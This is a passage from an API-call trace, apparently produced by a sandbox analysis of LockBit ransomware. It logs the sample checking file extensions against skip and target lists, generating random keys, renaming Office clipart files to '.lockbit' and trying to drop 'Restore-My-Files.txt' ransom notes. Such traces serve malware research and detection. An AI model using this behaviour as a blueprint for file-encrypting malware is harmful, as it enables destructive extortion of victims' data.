(lpString1=".mdf", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.814] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.814] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03470_.WMF.lockbit") returned 72 [0167.814] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03470_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03470_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.815] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.815] malloc (_Size=0x40068) returned 0x3d70450 [0167.815] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=14744) returned 1 [0167.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0167.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0167.816] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.821] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03470_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03470_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.821] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.821] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.822] free (_Block=0x1fa2ed8) [0167.823] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03470_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.823] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.823] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3716500, ftCreationTime.dwHighDateTime=0x1bd4be9, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3716500, ftLastWriteTime.dwHighDateTime=0x1bd4be9, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03513_.WMF", cAlternateFileName="")) returned 1 [0167.823] lstrcmpiW (lpString1=".", lpString2="PE03513_.WMF") returned -1 [0167.823] lstrcmpiW (lpString1="..", lpString2="PE03513_.WMF") returned -1 [0167.823] PathFindExtensionW (pszPath="PE03513_.WMF") returned=".WMF" [0167.823] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.823] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.824] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.824] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.825] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03513_.WMF") returned 1 [0167.825] lstrcmpiW (lpString1="ntldr", lpString2="PE03513_.WMF") returned -1 [0167.825] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03513_.WMF") returned -1 [0167.825] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03513_.WMF") returned -1 [0167.825] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03513_.WMF") returned -1 [0167.825] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03513_.WMF") returned 1 [0167.825] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03513_.WMF") returned -1 [0167.825] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.826] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03513_.WMF") returned=".WMF" [0167.826] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.826] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.826] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.827] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.827] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03513_.WMF.lockbit") returned 72 [0167.827] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03513_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.832] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.832] malloc (_Size=0x40068) returned 0x3f70048 [0167.832] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3780) returned 1 [0167.832] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0167.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0167.833] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03513_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03513_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.836] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.836] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.837] free (_Block=0x1fa2ed8) [0167.837] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03513_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.837] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.837] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.837] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32062000, ftCreationTime.dwHighDateTime=0x1bd4be8, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x32062000, ftLastWriteTime.dwHighDateTime=0x1bd4be8, nFileSizeHigh=0x0, nFileSizeLow=0x1868, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03668_.WMF", cAlternateFileName="")) returned 1 [0167.838] lstrcmpiW (lpString1=".", lpString2="PE03668_.WMF") returned -1 [0167.838] lstrcmpiW (lpString1="..", lpString2="PE03668_.WMF") returned -1 [0167.838] PathFindExtensionW (pszPath="PE03668_.WMF") returned=".WMF" [0167.838] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.838] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.839] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.839] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.840] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03668_.WMF") returned 1 [0167.840] lstrcmpiW (lpString1="ntldr", lpString2="PE03668_.WMF") returned -1 [0167.840] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03668_.WMF") returned -1 [0167.840] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03668_.WMF") returned -1 [0167.840] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03668_.WMF") returned -1 [0167.840] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03668_.WMF") returned 1 [0167.840] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03668_.WMF") returned -1 [0167.840] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.840] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03668_.WMF") returned=".WMF" [0167.841] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.841] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.841] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.842] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.842] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03668_.WMF.lockbit") returned 72 [0167.842] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03668_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03668_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0167.843] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.843] malloc (_Size=0x40068) returned 0x3e70008 [0167.843] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6248) returned 1 [0167.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0167.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0167.844] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0167.850] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03668_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03668_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.850] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.850] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.851] free (_Block=0x1fa2ed8) [0167.851] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03668_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.851] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.851] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.851] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb300a00, ftCreationTime.dwHighDateTime=0x1bd4be7, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfb300a00, ftLastWriteTime.dwHighDateTime=0x1bd4be7, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03731_.WMF", cAlternateFileName="")) returned 1 [0167.851] lstrcmpiW (lpString1=".", lpString2="PE03731_.WMF") returned -1 [0167.851] lstrcmpiW (lpString1="..", lpString2="PE03731_.WMF") returned -1 [0167.851] PathFindExtensionW (pszPath="PE03731_.WMF") returned=".WMF" [0167.851] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.851] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.852] lstrcmpiW (lpString1=".prf", lpString2=".WMF") 